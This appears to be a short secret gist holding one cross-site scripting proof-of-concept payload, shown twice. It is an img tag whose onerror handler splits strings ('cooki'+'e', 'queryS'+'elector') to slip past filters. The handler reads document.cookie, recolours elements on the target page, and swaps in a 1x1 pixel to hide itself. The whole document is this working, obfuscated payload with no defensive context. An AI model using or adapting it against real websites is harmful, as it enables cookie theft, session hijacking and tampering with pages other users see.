camelcaseblog/bhol-xss.html Secret

## bhol-xss.html
<img
    id="xss-image"
    src="/"
    onerror="d = document;
             c = ('cooki' + 'e').trim();
             qs = 'queryS' + 'elector';
             console.log(d[c]);
             d[qs + 'All']('.top_nlsitem').forEach(n => n.style.backgroundColor = 'green');
             d[qs]('#xss-image').src = 'ht' + 'tps://upload.wikimedia.org/wikipedia/commons/c/ca/1x1.png';"
/>
	<img
	id="xss-image"
	src="/"
	onerror="d = document;
	c = ('cooki' + 'e').trim();
	qs = 'queryS' + 'elector';
	console.log(d[c]);
	d[qs + 'All']('.top_nlsitem').forEach(n => n.style.backgroundColor = 'green');
	d[qs]('#xss-image').src = 'ht' + 'tps://upload.wikimedia.org/wikipedia/commons/c/ca/1x1.png';"
	/>